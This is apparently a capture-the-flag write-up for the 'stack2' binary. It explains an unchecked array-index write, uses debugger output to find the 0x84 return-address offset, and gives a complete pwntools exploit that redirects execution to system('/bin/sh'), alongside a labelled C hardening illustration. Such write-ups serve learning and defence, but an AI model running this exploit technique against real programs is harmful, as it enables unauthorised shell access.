Filling in a gap =-= noting down how to find the array offset.
攻防世界 stack2
There is an array out-of-bounds write, as shown below:
```c
puts("which number to change:");
__isoc99_scanf("%d", &v5);
puts("new number:");
__isoc99_scanf("%d", &v7);
v13[v5] = v7;
```
The boxed part 1 in the figure above (the screenshot is not reproduced here) is where the array assignment happens: the cl register does the counting, and eax clearly holds the array's base address.
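The decompiled write above uses v5 straight from scanf("%d") without any range check, so a negative or too-large index lands outside v13. As an added illustration that is not part of the original writeup, the following C program puts that vulnerable pattern beside a hardened version that rejects indices outside [0, count). The 8-slot array, the 4 guard bytes that stand in for data beyond the array, and the function names are constructed assumptions, not the layout of the challenge binary.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed layout (an assumption, not the challenge binary's real frame):
 * COUNT one-byte number slots followed by a 4-byte guard that stands in for
 * whatever lives beyond the array on the stack, such as the saved return
 * address (0x84 bytes past the array base in the writeup above). */
#define COUNT 8
#define GUARD_LEN 4
#define REGION_LEN (COUNT + GUARD_LEN)

static const uint8_t GUARD_INIT[GUARD_LEN] = {0x11, 0x22, 0x33, 0x44};

/* Vulnerable pattern from the decompiled snippet: the index comes straight
 * from scanf("%d") and is used without any range check. */
static void change_unchecked(uint8_t *v13, int v5, int v7)
{
    v13[v5] = (uint8_t)v7;
}

/* Hardened version: accept only indices in [0, count). The explicit v5 < 0
 * test comes first so a negative index is rejected instead of wrapping to a
 * huge unsigned value in the comparison. Returns false when rejected. */
static bool change_checked(uint8_t *v13, size_t count, int v5, int v7)
{
    if (v5 < 0 || (size_t)v5 >= count)
        return false;
    v13[v5] = (uint8_t)v7;
    return true;
}

/* Perform one write against a fresh region through the selected path and
 * report whether the guard bytes survived. Only indices inside the region
 * are meaningful here; the unchecked path is the defect under test. */
bool guard_intact_after(int idx, int val, bool use_checked)
{
    uint8_t region[REGION_LEN];
    memset(region, 0, sizeof region);
    memcpy(region + COUNT, GUARD_INIT, GUARD_LEN);

    uint8_t *v13 = region;  /* the "numbers" array starts at the region base */
    if (use_checked)
        (void)change_checked(v13, COUNT, idx, val);
    else
        change_unchecked(v13, idx, val);

    return memcmp(region + COUNT, GUARD_INIT, GUARD_LEN) == 0;
}

/* Does the hardened path accept this index at all? */
bool index_accepted(int idx)
{
    uint8_t v13[COUNT] = {0};
    return change_checked(v13, COUNT, idx, 0x50);
}

int main(void)
{
    printf("index 3, unchecked: guard intact = %d\n", guard_intact_after(3, 0x50, false));
    printf("index %d, unchecked: guard intact = %d\n", COUNT, guard_intact_after(COUNT, 0x50, false));
    printf("index %d, checked:   guard intact = %d\n", COUNT, guard_intact_after(COUNT, 0x50, true));
    printf("index -1 accepted by checked path: %d\n", index_accepted(-1));
    return 0;
}
```

The guard region makes the effect visible without any real frame corruption: an index equal to COUNT silently overwrites the first guard byte on the unchecked path and is refused on the checked one, which is exactly the difference between the decompiled code and a fixed build.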
To redirect execution to a function, we need the distance from the array base address to the saved return address that ret will use.
So the first breakpoint goes at mov [eax], cl,
and the second at main's ret.
Result
As shown below, eax is the array base address:
```
EAX 0xffffcf88 ◂— 0xe0
EBX 0x0
ECX 0xff
EDX 0xffffcf88 ◂— 0xe0
EDI 0xf7fb8000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0
ESI 0xf7fb8000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0
EBP 0xffffcff8 ◂— 0x0
ESP 0xffffcf50 —▸ 0xf7ffda74 —▸ 0xf7fd3470 —▸ 0xf7ffd918 ◂— 0x0
EIP 0x80486d5 (main+261) ◂— mov byte ptr [eax], cl
```
As shown below, esp (the stack pointer register) now points at the saved return address, since we are stopped at ret:
```
*EAX 0x0
 EBX 0x0
*ECX 0xffffd010 ◂— 0x1
*EDX 0xf7fb987c (_IO_stdfile_0_lock) ◂— 0x0
 EDI 0xf7fb8000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0
 ESI 0xf7fb8000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0
*EBP 0x0
*ESP 0xffffd00c —▸ 0xf7e1d647 (__libc_start_main+247) ◂— add esp, 0x10
*EIP 0x80488f2 (main+802) ◂— ret
```
The address of the return slot (esp at ret) minus the address stored in eax:
hex(0xffffd00c - 0xffffcf88)
= 0x84
Because the server environment is broken and no libc .so is provided afterwards, we use system plus the "/bin/sh" string instead.
Exploit (exp):
```python
from pwn import *

r = process("./stack2")

# Answer the two startup prompts with a single number.
r.recvuntil(b"How many numbers you have:\n")
r.sendline(b"1")
r.recvuntil(b"Give me your numbers\n")
r.sendline(b"1")


def change(addr, num):
    # Menu option 3: write one byte `num` at array index `addr` (the out-of-bounds write).
    r.recvuntil(b"5. exit\n")
    r.sendline(b"3")
    r.recvuntil(b"which number to change:\n")
    r.sendline(str(addr).encode())
    r.recvuntil(b"new number:\n")
    r.sendline(str(num).encode())


# Offset 0x84 is the saved return address (little-endian, one byte per call).
change(0x84, 0x50)
change(0x85, 0x84)
change(0x86, 0x04)
change(0x87, 0x08)
# Offset 0x8c is the first argument slot: the "/bin/sh" string.
change(0x8c, 0x87)
change(0x8d, 0x89)
change(0x8e, 0x04)
change(0x8f, 0x08)

# Menu option 5: exit, so main returns.
r.sendline(b"5")
r.interactive()
```